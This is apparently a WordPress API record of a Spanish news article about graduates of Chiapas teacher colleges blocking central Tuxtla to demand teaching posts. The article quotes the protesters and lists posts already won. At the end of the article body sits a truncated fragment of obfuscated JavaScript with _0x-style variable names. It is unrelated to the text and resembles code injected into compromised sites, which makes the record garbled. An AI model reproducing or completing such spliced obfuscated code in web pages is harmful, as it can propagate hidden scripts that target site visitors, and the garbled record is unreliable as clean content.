{"id":24945,"date":"2025-11-07T02:35:21","date_gmt":"2025-11-07T02:35:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24945"},"modified":"2025-11-07T02:35:22","modified_gmt":"2025-11-07T02:35:22","slug":"continuan-protestas-de-egresados-normalistas-no-liberan-plazas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24945","title":{"rendered":"Contin\u00faan protestas de egresados normalistas, no liberan plazas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000423723-1024x768.jpg\" alt=\"\" class=\"wp-image-24946\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000423723-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000423723-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000423723-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000423723-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000423723-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>6 de noviembre del 2025. Tuxtla.- Un grupo de normalistas bloquearon en el centro de la capital chiapaneca, con el objetivo de exigir a las autoridades estatales y federales la &#8220;liberaci\u00f3n justa&#8221; de plazas docentes, ante la falta de respuesta a una demanda que, mantienen desde hace cinco meses.<\/p>\n\n\n\n<p>En entrevista los manifestantes explicaron que el principal se encuentra a nivel federal, donde el proceso de asignaci\u00f3n est\u00e1 estancado. &#8220;Es donde hemos mantenido m\u00e1s problemas, donde no hemos avanzado ni un poco. No hemos tenido respuesta ni favorable ni a medias\u201d.<\/p>\n\n\n\n<p>La protesta, que congestion\u00f3 el tr\u00e1fico en la Avenida Central , sin embargo, respondieron que. \u201cNo se vale que nos tengan aqu\u00ed esperando y tengamos que llegar a este punto para que nos puedan hacer caso y nos den una respuesta clara\u201d.<\/p>\n\n\n\n<p>Detallaron que no se trata \u00fanicamente de egresados de escuelas normales, sino tambi\u00e9n de profesionales de la pedagog\u00eda de diversas partes del estado.<\/p>\n\n\n\n<p>&#8220;Venimos de diferentes lugares de nuestro Chiapas. Cada que venimos, gastamos. As\u00ed como gastamos en la educaci\u00f3n, tambi\u00e9n estamos gastando en esta lucha, que es parte de nuestra identidad como maestros&#8221;, relataron.<\/p>\n\n\n\n<p>Este grupo demanda plazas para m\u00e1s de 100 egresados por \u00e1rea, buscando que se asigne al menos &#8220;una tercera o cuarta parte&#8221; de las plazas disponibles.<\/p>\n\n\n\n<p>Hasta el momento, reconocieron haber obtenido algunos resultados en niveles espec\u00edficos: 83 plazas en tres secundarias, aproximadamente 40 en preescolar y 43 en educaci\u00f3n f\u00edsica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 6 de noviembre del 2025. Tuxtla.- Un grupo de normalistas bloquearon en el centro de la capital chiapaneca, con el objetivo de exigir a las autoridades estatales y federales la &#8220;liberaci\u00f3n justa&#8221; de plazas docentes, ante la falta de respuesta a una demanda que, mantienen desde hace cinco meses. En entrevista los manifestantes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24946,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24945","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24945","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24945"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24945\/revisions"}],"predecessor-version":[{"id":24947,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24945\/revisions\/24947"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24946"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}